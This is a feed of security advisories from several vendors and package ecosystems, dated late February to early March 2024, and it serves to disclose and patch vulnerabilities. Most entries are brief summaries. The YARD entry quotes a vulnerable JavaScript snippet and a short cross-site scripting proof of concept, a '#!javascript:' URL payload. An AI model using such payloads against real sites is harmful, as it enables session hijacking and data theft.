28.02.2024 20:40:04	slackware	[SSA:2024-059-01] wpa_supplicant	New wpa_supplicant packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/wpa_supplicant-2.10-i586-2_slack15.0.txz: Rebuilt. Patched the implementation of PEAP in wpa_supplicant to prevent an authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-52160 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/wpa_supplicant-2.10-i586-2_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/wpa_supplicant-2.10-x86_64-2_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/wpa_supplicant-2.10-i586-3.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/wpa_supplicant-2.10-x86_64-3.txzMD5 signaturesSlackware 15.0 package:2be83120eeae199735756d3ecfc9afd8 wpa_supplicant-2.10-i586-2_slack15.0.txzSlackware x86_64 15.0 package:2bcea46d6ae7cd861208fe92f08e44ce wpa_supplicant-2.10-x86_64-2_slack15.0.txzSlackware -current package:d44e7e706bc44d6c2978e97bdf6299d3 n/wpa_supplicant-2.10-i586-3.txzSlackware x86_64 -current package:5bb12ec9109ef4dbb58b4a0276ccbcfa n/wpa_supplicant-2.10-x86_64-3.txzInstallation instructions*Upgrade the package as root:`# upgradepkg wpa_supplicant-2.10-i586-2_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-059-01
28.02.2024 20:18:33	ubuntu	[USN-6648-2] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6648-2
28.02.2024 19:52:15	ubuntu	[USN-6653-2] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-2
28.02.2024 19:12:46	ubuntu	[USN-6651-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-2
28.02.2024 18:00:00	cisco	[CISCO-SA-UCSFI-IMM-SYN-P6KZTDQC] Cisco UCS 6400 and 6500 Series Fabric Interconnects Intersight Managed Mode Denial of Service Vulnerability (medium)	A vulnerability in system resource management in Cisco UCS 6400 and 6500 Series Fabric Interconnects that are in Intersight Managed Mode (IMM) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the Device Console UI of an affected device.This vulnerability is due to insufficient rate-limiting of TCP connections to an affected device. An attacker could exploit this vulnerability by sending a high number of TCP packets to the Device Console UI. A successful exploit could allow an attacker to cause the Device Console UI process to crash, resulting in a DoS condition. A manual reload of the fabric interconnect is needed to restore complete functionality.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UCSFI-IMM-SYN-P6KZTDQC
28.02.2024 18:00:00	cisco	[CISCO-SA-NXOS-PO-ACL-TKYEPGVL] Cisco Nexus 3000 and 9000 Series Switches Port Channel ACL Programming Vulnerability (medium)	A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-PO-ACL-TKYEPGVL
28.02.2024 18:00:00	cisco	[CISCO-SA-NXOS-LLDP-DOS-Z7PNCTGT] Cisco FXOS and NX-OS Software Link Layer Discovery Protocol Denial of Service Vulnerability (medium)	A vulnerability in the Link Layer Discovery Protocol (LLDP) feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper handling of specific fields in an LLDP frame. An attacker could exploit this vulnerability by sending a crafted LLDP packet to an interface of an affected device and having an authenticated user retrieve LLDP statistics from the affected device through CLI show commands or Simple Network Management Protocol (SNMP) requests. A successful exploit could allow the attacker to cause the LLDP service to crash and stop running on the affected device. In certain situations, the LLDP crash may result in a reload of the affected device.Note: LLDP is a Layer 2 link protocol. To exploit this vulnerability, an attacker would need to be directly connected to an interface of an affected device, either physically or logically (for example, through a Layer 2 Tunnel configured to transport the LLDP protocol).Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-LLDP-DOS-Z7PNCTGT
28.02.2024 18:00:00	cisco	[CISCO-SA-NXOS-EBGP-DOS-L3QCWVJ] Cisco NX-OS Software External Border Gateway Protocol Denial of Service Vulnerability (high)	A vulnerability in the External Border Gateway Protocol (eBGP) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability exists because eBGP traffic is mapped to a shared hardware rate-limiter queue. An attacker could exploit this vulnerability by sending large amounts of network traffic with certain characteristics through an affected device. A successful exploit could allow the attacker to cause eBGP neighbor sessions to be dropped, leading to a DoS condition in the network.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-EBGP-DOS-L3QCWVJ
28.02.2024 18:00:00	cisco	[CISCO-SA-IPV6-MPLS-DOS-R9YCXKWM] Cisco NX-OS Software MPLS Encapsulated IPv6 Denial of Service Vulnerability (high)	A vulnerability with the handling of MPLS traffic for Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the netstack process to unexpectedly restart, which could cause the device to stop processing network traffic or to reload.This vulnerability is due to lack of proper error checking when processing an ingress MPLS frame. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that is encapsulated within an MPLS frame to an MPLS-enabled interface of the targeted device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition.Note: The IPv6 packet can be generated multiple hops away from the targeted device and then encapsulated within MPLS. The DoS condition may occur when the NX-OS device processes the packet.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IPV6-MPLS-DOS-R9YCXKWM
28.02.2024 15:35:43	ubuntu	[USN-6668-1] python-openstackclient vulnerability	python-openstackclient could delete incorrect access rules.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6668-1
28.02.2024 15:27:00	ubuntu	[USN-6667-1] Cpanel-JSON-XS vulnerability	Cpanel-JSON-XS could be made to crash or expose information if itprocessed specially crafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6667-1
28.02.2024 15:20:14	ubuntu	[USN-6666-1] libuv vulnerability (high)	libuv could be made to truncate certain hostnames.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6666-1
28.02.2024 15:15:08	alpinelinux	[ALPINE:CVE-2024-21885] xwayland, xorg-server vulnerability (high)	[From CVE-2024-21885] A flaw was found in X.Org server. In the XISendDeviceHierarchyEvent function, it is possible to exceed the allocated array length when certain new device IDs are added to the xXIHierarchyInfo struct. This can trigger a heap buffer overflow condition, which may lead to an application crash or remote code execution in SSH X11 forwarding environments.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-21885
28.02.2024 15:15:08	alpinelinux	[ALPINE:CVE-2024-21886] xorg-server, xwayland vulnerability (high)	[From CVE-2024-21886] A heap buffer overflow flaw was found in the DisableDevice function in the X.Org server. This issue may lead to an application crash or, in some circumstances, remote code execution in SSH X11 forwarding environments.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-21886
28.02.2024 15:10:23	ubuntu	[USN-6665-1] Unbound vulnerabilities (high)	Several security issues were fixed in Unbound.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6665-1
28.02.2024 10:00:00	msrc	[MS:CVE-2024-21626] GitHub: CVE-2024-21626 Container breakout through process.cwd trickery and leaked fds (high)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21626
28.02.2024 02:00:00	debian	[DSA-5634-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5634-1
28.02.2024 02:00:00	oraclelinux	[ELSA-2024-0956] postgresql:10 security update (important)	[10.23-4.0.1]- Resolves: CVE-2024-0985	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0956
28.02.2024 02:00:00	oraclelinux	[ELSA-2024-0965] unbound security update (important)	[1.16.2-5.2]- bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)- bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0965
28.02.2024 02:00:00	oraclelinux	[ELSA-2024-0977] unbound security update (important)	[1.16.2-3.1]- Fix DNSSEC validation vulnerabilities which can lead to DoS in trivially orchestrated attacks (CVE-2023-50387 and CVE-2023-50868)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0977
29.02.2024 01:16:05	rubysec	[RUBYSEC:YARD-2024-27285] YARD's default template vulnerable to Cross-site Scripting in generated frames.html (medium)	### SummaryThe "frames.html" file within the Yard Doc's generated documentationis vulnerable to Cross-Site Scripting (XSS) attacks due to inadequatesanitization of user input within the JavaScript segment of the"frames.erb" template file.### DetailsThe vulnerability stems from mishandling user-controlled data retrievedfrom the URL hash in the embedded JavaScript code within the "frames.erb"template file. Specifically, the script lacks proper sanitization ofthe hash data before utilizing it to establish the top-level window'slocation. This oversight permits an attacker to inject maliciousJavaScript payloads through carefully crafted URLs.Snippet from "frames.erb":```erb<script type="text/javascript"> var match = unescape(window.location.hash).match(/^#!(.+)/); var name = match ? match[1] : '<= url_for_main >'; name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, ''); window.top.location = name;</script>```### PoC (Proof of Concept)To exploit this vulnerability:1. Gain access to the generated Yard Doc.2. Locate and access the "frames.html" file.3. Construct a URL containing the malicious payload in the hash segment, for instance: `#!javascript:xss`### ImpactThis XSS vulnerability presents a substantial threat by enablingan attacker to execute arbitrary JavaScript code within the user'ssession context. Potential ramifications include session hijacking,theft of sensitive data, unauthorized access to user accounts, anddefacement of websites. Any user visiting the compromised page issusceptible to exploitation. It is critical to promptly addressthis vulnerability to mitigate potential harm to users and preservethe application's integrity.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:YARD-2024-27285
28.02.2024 19:09:55	rustsec	[RUSTSEC-2024-0017] Non-idiomatic use of iterators leads to use after free	Code that attempts to use an item (e.g., a row) returned by an iterator after the iterator has advanced to the next item will be accessing freed memory and experience undefined behaviour. Code that uses the item and then advances the iterator is unaffected. This problem has always existed.This is a use-after-free bug, so it's rated high severity. If your code uses a pre-3.0.0 version of cassandra-rs, and uses an item returned by a cassandra-rs iterator after calling `next()` on that iterator, then it is vulnerable. However, such code will almost always fail immediately - so we believe it is unlikely that any code using this pattern would have reached production. For peace of mind, we recommend you upgrade anyway.## PatchesThe problem has been fixed in version 3.0.0 (commit 299e6ac50f87eb2823a373baec37b590a74994ee). Users should upgrade to ensure their code cannot use the problematic pattern. There is an upgrade guide in the project README.## WorkaroundsEnsure all usage fits the expected pattern. For example, use `get_first_row()` rather than an iterator, or completely process an item before advancing the iterator with `next()`.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0017
28.02.2024 17:09:26	almalinux	[ALSA-2024:0967] opensc security update (moderate)	opensc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0967
28.02.2024 16:50:38	almalinux	[ALSA-2024:0975] postgresql:13 security update (important)	postgresql:13 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0975
28.02.2024 16:58:47	almalinux	[ALSA-2024:0974] postgresql:12 security update (important)	postgresql:12 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0974
28.02.2024 17:04:35	almalinux	[ALSA-2024:0973] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0973
28.02.2024 17:24:26	almalinux	[ALSA-2024:0965] unbound security update (important)	unbound security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0965
28.02.2024 17:41:58	almalinux	[ALSA-2024:0956] postgresql:10 security update (important)	postgresql:10 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0956
28.02.2024 17:18:29	almalinux	[ALSA-2024:0966] opensc security update (moderate)	opensc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0966
28.02.2024 17:29:38	almalinux	[ALSA-2024:0964] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0964
28.02.2024 17:49:38	almalinux	[ALSA-2024:0955] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0955
28.02.2024 16:41:33	almalinux	[ALSA-2024:0977] unbound security update (important)	unbound security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0977
28.02.2024 17:36:17	almalinux	[ALSA-2024:0963] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0963
28.02.2024 02:00:00	freebsd	[FREEBSD:3DADA2D5-4E17-4E39-97DD-14FDBD4356FB] null -- Routinator terminates when RTR connection is reset too quickly after opening (high)	sep@nlnetlabs.nl reports: Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3DADA2D5-4E17-4E39-97DD-14FDBD4356FB
28.02.2024 18:18:57	almalinux	[ALSA-2024:0950] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0950
28.02.2024 17:59:36	almalinux	[ALSA-2024:0952] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0952
28.02.2024 18:06:24	almalinux	[ALSA-2024:0951] postgresql security update (important)	postgresql security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0951
29.02.2024 01:57:11	rubysec	[RUBYSEC:RACK-2024-25126] Denial of Service Vulnerability in Rack Content-Type Parsing	There is a possible denial of service vulnerability in the content typeparsing component of Rack. This vulnerability has been assigned the CVEidentifier CVE-2024-25126.Versions Affected: >= 0.4 Not affected: < 0.4 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted content type headers can cause Rack’s media type parser totake much longer than expected, leading to a possible denial of servicevulnerability.Impacted code will use Rack’s media type parser to parse content type headers.This code will look like below:```request.media_type## ORrequest.media_type_params## ORRack::MediaType.type(content_type)```Some frameworks (including Rails) call this code internally, so upgrading isrecommended!All users running an affected release should either upgrade or use one of theworkarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-25126
29.02.2024 01:57:11	rubysec	[RUBYSEC:RACK-2024-26141] Possible DoS Vulnerability with Range Header in Rack	There is a possible DoS vulnerability relating to the Range request header inRack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted Range headers can cause a server to respond with anunexpectedly large response. Responding with such large responses could leadto a denial of service issue.Vulnerable applications will use the `Rack::File` middleware or the`Rack::Utils.byte_ranges` methods (this includes Rails applications).# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26141
29.02.2024 01:57:11	rubysec	[RUBYSEC:RACK-2024-26146] Possible Denial of Service Vulnerability in Rack Header Parsing	There is a possible denial of service vulnerability in the header parsingroutines in Rack. This vulnerability has been assigned the CVE identifierCVE-2024-26146.Versions Affected: All. Not affected: None Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1# ImpactCarefully crafted headers can cause header parsing in Rack to take longer thanexpected resulting in a possible denial of service issue. `Accept` and`Forwarded` headers are impacted.Ruby 3.2 has mitigations for this problem, so Rack applications usingRuby 3.2 or newer are unaffected.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26146
29.02.2024 22:10:04	npm	[NPM:GHSA-9VX6-7XXF-X967] OpenZeppelin Contracts base64 encoding may read from potentially dirty memory (low)	### ImpactThe `Base64.encode` function encodes a `bytes` input by iterating over it in chunks of 3 bytes. When this input is not a multiple of 3, the last iteration may read parts of the memory that are beyond the input buffer.Although the `encode` function pads the output for these cases, up to 4 bits of data are kept between the encoding and padding, corrupting the output if these bits were dirty (i.e. memory after the input is not 0). These conditions are more frequent in the following scenarios:- A `bytes memory` struct is allocated just after the input and the first bytes of it are non-zero.- The memory pointer is set to a non-empty memory location before allocating the input.Developers should evaluate whether the extra bits can be maliciously manipulated by an attacker.### PatchesUpgrade to 5.0.2 or 4.9.6.### ReferencesThis issue was reported by the Independent Security Researcher Riley Holterhus through Immunefi (@rileyholterhus on X)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9VX6-7XXF-X967
29.02.2024 22:04:54	msrc	[MS:CVE-2024-1939] Chromium: CVE-2024-1939 Type Confusion in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1939
29.02.2024 22:04:50	msrc	[MS:CVE-2024-1938] Chromium: CVE-2024-1938 Type Confusion in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1938
29.02.2024 18:02:17	ubuntu	[USN-6671-1] php-nyholm-psr7 vulnerability (high)	An header injection issue was fixed in php-nyholm-psr7.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6671-1
29.02.2024 17:52:29	ubuntu	[USN-6670-1] php-guzzlehttp-psr7 vulnerabilities (high)	Several header injection issues were fixed in php-guzzlehttp-psr7.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6670-1
29.02.2024 16:24:58	ubuntu	[USN-6653-3] Linux kernel (Low Latency) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-3
29.02.2024 16:24:04	ubuntu	[USN-6651-3] Linux kernel (StarFive) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-3
29.02.2024 16:23:18	ubuntu	[USN-6647-2] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6647-2
29.02.2024 10:00:00	msrc	[MS:CVE-2024-26196] Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26196
29.02.2024 22:10:54	maven	[MAVEN:GHSA-3HRR-XWVG-HXVR] Keycloak DoS via account lockout (low)	A flaw was found in Keycloak. In certain conditions, this issue may allow a remote unauthenticated attacker to block other accounts from logging in.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3HRR-XWVG-HXVR
29.02.2024 22:10:46	maven	[MAVEN:GHSA-6QVW-249J-H44C] jose4j denial of service via specifically crafted JWE (moderate)	The jose4j component before 0.9.4 for Java allows attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6QVW-249J-H44C
29.02.2024 03:06:24	go	[GO-2024-2554] Path traversal in helm.sh/helm/v3 (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2554
29.02.2024 02:00:00	cisa	[CISA-2024:0229] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0229
29.02.2024 01:58:01	go	[GO-2022-0427] Unprotected file upload in github.com/swaggo/http-swagger (high)	The httpSwagger package's HTTP handler provides WebDAV read/write access to anin-memory filesystem. An attacker can exploit this to cause memory exhaustion byuploading many files, XSS attacks by uploading malicious files, or otherunexpected behaviors.	https://secdb.nttzen.cloud/security-advisory/go/GO-2022-0427
29.02.2024 02:00:00	freebsd	[FREEBSD:3567456A-6B17-41F7-BA7F-5CD3EFB2B7C9] electron{27,28} -- Use after free in Mojo	Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-1670.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3567456A-6B17-41F7-BA7F-5CD3EFB2B7C9
29.02.2024 02:00:00	freebsd	[FREEBSD:31BB1B8D-D6DC-11EE-86BB-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 4 security fixes: [324596281] High CVE-2024-1938: Type Confusion in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-11 [323694592] High CVE-2024-1939: Type Confusion in V8. Reported by Bohan Liu (@P4nda20371774) of Tencent Security Xuanwu Lab on 2024-02-05	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:31BB1B8D-D6DC-11EE-86BB-A8A1599412C6
01.03.2024 23:15:07	alpinelinux	[ALPINE:CVE-2024-20328] clamav vulnerability (medium)	[From CVE-2024-20328] A vulnerability in the VirusEvent feature of ClamAV could allow a local attacker to inject arbitrary commands with the privileges of the application service account.The vulnerability is due to unsafe handling of file names. A local attacker could exploit this vulnerability by supplying a file name containing command-line sequences. When processed on a system using configuration options for the VirusEvent feature, the attacker could cause the application to execute arbitrary commands.ClamAV has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20328
01.03.2024 22:11:11	npm	[NPM:GHSA-5MHG-WV8W-P59J] Directus version number disclosure (moderate)	### ImpactCurrently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version.### PatchesThe problem has been resolved in versions 10.8.3 and newer### WorkaroundsNone	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5MHG-WV8W-P59J
01.03.2024 22:09:00	npm	[NPM:GHSA-4G2X-VQ5P-5VJ6] Budibase affected by VM2 Constructor Escape Vulnerability (critical)	### ImpactPreviously, budibase used a library called `vm2` for code execution inside the Budibase builder and apps, such as the UI below for configuring bindings in the design section.![Screenshot 2024-03-01 at 13 50 16](https://github.com/Budibase/budibase/assets/11256663/5f049b64-cd99-48fd-a184-644cd312c82e)Due to a [vulnerability in vm2](https://github.com/advisories/GHSA-cchq-frgv-rjh5), any environment that executed the code server side (automations and column formulas) was susceptible to this vulnerability, allowing users to escape the sandbox provided by `vm2`, and to expose server side variables such as `process.env`. It's recommended by the authors of `vm2` themselves that you should move to another solution for remote JS execution due to this vulnerability.### PatchesWe moved our entire JS sandbox infrastructure over to `isolated-vm`, a much more secure and recommended library for remote code execution in 2.20.0. This also comes with a performance benefit in the way we cache and execute your JS server side. The budibase cloud platform has been patched already and is not running `vm2`, but self host users will need to manage the updates by themselves.If you are a self hosted user, you can take the following steps to reproduce the exploit and to verify if your installation is currently affected.Create a new formula column on one of your tables in the data section with the following configuration.![Screenshot 2024-03-01 at 14 04 28](https://github.com/Budibase/budibase/assets/11256663/0f8bc19b-9e44-4e95-ab4e-6ef6278eea34)Add the following JS function to the formula and save.![Screenshot 2024-03-01 at 14 05 19](https://github.com/Budibase/budibase/assets/11256663/1d0c9705-1a88-49b0-93e0-f385a04b5c25)If your installation is vulnerable, when the formula evaluates you will be able to see the printed `process.env` in your new formula field. If not, your installation is not affected.### WorkaroundsThere is no workaround at this time for any budibase app that uses JS. You must fully migrate post version 2.20.0 to patch the vulnerability.### References- https://github.com/advisories/GHSA-cchq-frgv-rjh5	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4G2X-VQ5P-5VJ6
01.03.2024 22:08:24	npm	[NPM:GHSA-6927-3VR9-FXF2] ZDI-CAN-19105: Parse Server literalizeRegexPart SQL Injection (critical)	### ImpactThis vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database.### PatchesThe algorithm to detect SQL injection has been improved.### WorkaroundsNone.### References- https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2- https://github.com/parse-community/parse-server/releases/tag/6.5.0 (fixed in Parse Server 6)- https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20 (fixed in Parse Server 7 alpha release)### Credits- Mikhail Shcherbakov (https://twitter.com/yu5k3) working with Trend Micro Zero Day Initiative (finder)- Ehsan Persania (remediation developer)- Manuel Trezza (coordinator)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6927-3VR9-FXF2
01.03.2024 23:46:44	maven	[MAVEN:GHSA-HP2X-6VRM-7J7V] Apache Archiva Reflected Cross-site Scripting vulnerability (moderate)	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva.This issue affects Apache Archiva: from 2.0.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HP2X-6VRM-7J7V
01.03.2024 22:12:22	maven	[MAVEN:GHSA-RV4H-M4WC-V99W] Apache Archiva Incorrect Authorization vulnerability (moderate)	UNSUPPORTED WHEN ASSIGNED Incorrect Authorization vulnerability in Apache Archiva.Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RV4H-M4WC-V99W
01.03.2024 22:12:19	maven	[MAVEN:GHSA-H595-VWHC-3XWX] Apache Archiva Incorrect Authorization vulnerability (moderate)	UNSUPPORTED WHEN ASSIGNED Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover.This issue affects Apache Archiva: from 2.0.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H595-VWHC-3XWX
